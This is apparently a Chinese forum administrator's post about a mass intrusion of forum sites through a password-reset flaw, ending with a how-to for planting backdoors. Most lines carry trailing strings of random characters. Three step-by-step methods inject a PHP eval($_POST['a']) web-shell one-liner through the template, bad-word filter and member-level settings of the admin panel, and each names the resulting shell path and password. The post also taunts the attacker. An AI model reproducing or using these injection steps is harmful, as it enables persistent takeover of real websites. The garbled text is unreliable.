黑客你是如此猖狂

郁闷，刚居然没提交成功，写那么多都白写了。.. mIw<ak9  

哎... ,f$_53 ;!  

今天下午5点多论坛出现问题，国内几个大站也相继被挂马,从QQ上站长找我的时间
来看几乎是一个时间段爆发的.也就是说工具
估计是在下午5:20左右公布出来的 2VWd(!l  

因为当时因为急着有事,我没做什么处理就是关闭了下论坛,把相关几个敏感的地方做了修改.. imR B_ut  

呵呵，
其实这次漏洞的利用出在require文件夹中的一个文件过滤不严格造成的，可以任意修改别人的密码 .. lGd[<14LO  

漏洞最先由国外某安全组织发布出来.接着由NEAOO发布到自己的BLOG上,于是下午5点多大规模爆发. 7hGe[!&l  

简单的分析下华北此次被入侵过程. sU at{j1  

17:26分黑客使用利用工具修改了我的管理员密码,此时的IP为221.226.90.135,修改后没有立即进行修改,而是做了一个比较聪明的举动，呵呵,估计知道华北的前身吧,他居然在前台上传附件,然后在附件中放如他的木马,呵呵，比较聪明的一招..可最后删除了这个帖子,进入后台修改了风格中的CSS文件,挂了他的木马.挂的木马是最新的那个过全系统的网马,危害很大.. lnm(vC%  

从入侵过程来看，持续了5分钟左右，从手段以及速度分析此人
不过是个小辈而已(呵呵，就是说你小辈,怎么了?不服气,有本事在来啊，呵呵，欢迎你继续.) GSi=V  

今天要不是因为个人问题,我们估计就
有的完了，呵呵 seXv9ED*  

以下是黑客进入后台中可能挂马以及六后门的地方，请大家注意 8%*|V g  

r'{ <p  

方式1 模板法 k45:B(F  

< g{%(*[  

进入后台， 风格模版设置 ，在随便一行写代码 (4 b8  

记住，这代码必须顶着左边行写，代码前面不可以有任何字符。 &rGiyP(L  

EOT; ;Qrs#vSG  

eval($a); bhLz)cEXr  

print << H(Bss~u  

s_a J|bU  

例如，我写完某一行为。 T+CS1 L5J  

.headurl { color:#ffffff;} !: yW`n'A  

EOT; 7! DR31c4  

eval($_POST[’a’]); il#XVY>MM  

print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;} 2`"8 =j  

AWV"S@[;  

而后得到一个shell jHCB$ZQb  

http://localhost/bbs/index.php >"b0!e  

（由于写到css里，也许有的操作无法返回，
但是只要没有什么问题，一般操作都是可以接受的） Y!`B,QLR  

密码是a lanker的一句话后门。 lh)O/=@d  

E9@Z{<C1F  

方式2 脏话过滤法 pWJrf%  

7,<cS8+  

进入安全管理 ◇ 不良
词语过滤 |dt cb  

.5y ;a/ZG  

新增 V_lrIB*&  

不良词语写 a’]=’aa’;eval($_POST[’a’]);// Q)9KQs  

替换为那里可以随意写 hY q;P{mh  

lsx x@W1  

而后得到一个shell地址为 pi}/xz`C  

http://localhost/bbs/data/bbscache/wordsfb.php R UffDa  

W99vV0lqh  

密码是a lanker的一句话后门。 #qW{ :  

Q6zo1  

方式3 用户等级管理 #1Ye#D/ug  

然后新建立会员组 7&e1$NJ  

头衔你可以随便写，但是千万不要写单双引号特殊符号，升级图片号写a’;eval($_POST[’a’]);// A($xXm  

升级点数依然可以随意写。 s?K7o4:#  

|J7kPFl  

而后得到一个shell地址为 <V#G\Gqva  

http://localhost/bbs/data/bbscache/level.php U{<7u\M-  

密码是a lanker的一句话后门。 e[ aA"T  

>s/~fm+Y  

这里提供的方式随便你选一种都可以得到shell。。。 (Q8*#.`i  

方式三请按说明仔细操作，否则会导致论坛无法正常运行，后果，自负 Pq{~jW?  

附件中给出利用工具以及修补办法,请
各位站长及时修补并检查后门 )i>-~  

补丁使用说明: 解压缩补丁包后将里面的upload目录覆盖论坛目录即可! Sa8[ k1V[E  

最后:强烈
鄙视下今天下午挂马的那位朋友的技术.太菜.呵呵..